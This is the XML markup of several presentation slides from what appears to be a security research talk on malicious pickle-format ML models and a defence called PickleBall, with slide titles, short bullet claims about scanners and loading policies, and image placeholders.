        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Backup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1122" name="Google Shape;1122;p89"/>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26" name="Shape 1126"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1127" name="Google Shape;1127;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Motivating Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1128" name="Google Shape;1128;p90"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1129" name="Google Shape;1129;p90" title="flair-example.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="809800" y="1400000"/>
            <a:ext cx="3700750" cy="2203325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1130" name="Google Shape;1130;p90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="809800" y="1030700"/>
            <a:ext cx="27174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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>flair/ner-english-fast</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter"/>
              <a:ea typeface="Inter"/>
              <a:cs typeface="Inter"/>
              <a:sym typeface="Inter"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755350" y="1573063"/>
            <a:ext cx="4231200" cy="432300"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Model has 800k downloads in September 2025</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1132" name="Google Shape;1132;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755350" y="2182677"/>
            <a:ext cx="4231200" cy="495900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Scanners show unrecognized imports, and can be bypassed.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755350" y="2868475"/>
            <a:ext cx="4231200" cy="495900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>Weights Only Unpickler policy cannot load this model. </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1134" name="Google Shape;1134;p90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771025" y="3927000"/>
            <a:ext cx="4231200" cy="495900"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>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latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>The user must determine themselves if the model is safe to load. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>How?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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38" name="Shape 1138"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1139" name="Google Shape;1139;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pickle Model Ecosystem Study</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140;p91"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1141" name="Google Shape;1141;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1203900"/>
            <a:ext cx="4601549" cy="2735700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1142" name="Google Shape;1142;p91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5021550" y="1985250"/>
            <a:ext cx="3721650" cy="1173000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1143" name="Google Shape;1143;p91"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5879625" y="1666425"/>
            <a:ext cx="20055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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>March 2025 Downloads</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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47" name="Shape 1147"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p92"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Benign Model Loading</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p92"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p92"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="958050"/>
            <a:ext cx="8839199" cy="3227409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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54" name="Shape 1154"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p93"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>SOTA Comparison</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p93"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p93"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="344525" y="1397113"/>
            <a:ext cx="8454950" cy="2349275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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61" name="Shape 1161"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Google Shape;1162;p94"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The Remaining Attack Surface</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p94"/>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1164" name="Google Shape;1164;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="1114500"/>
            <a:ext cx="7742700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> permits callables by answering “could the callable appear in a benign model”?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="2314650"/>
            <a:ext cx="7742700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>This is sufficient to block all discovered malicious models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700650" y="3514800"/>
            <a:ext cx="7742700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>Open question:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> can permitted callables be used in </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>reuse-style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> attacks?</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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70" name="Shape 1170"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1171" name="Google Shape;1171;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1172" name="Google Shape;1172;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Old</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="714900"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p95"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="630769" y="1518375"/>
            <a:ext cx="7914300" cy="2676300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p95"/>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1179" name="Shape 1179"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p96"/>
          <p:cNvSpPr txBox="1"/>
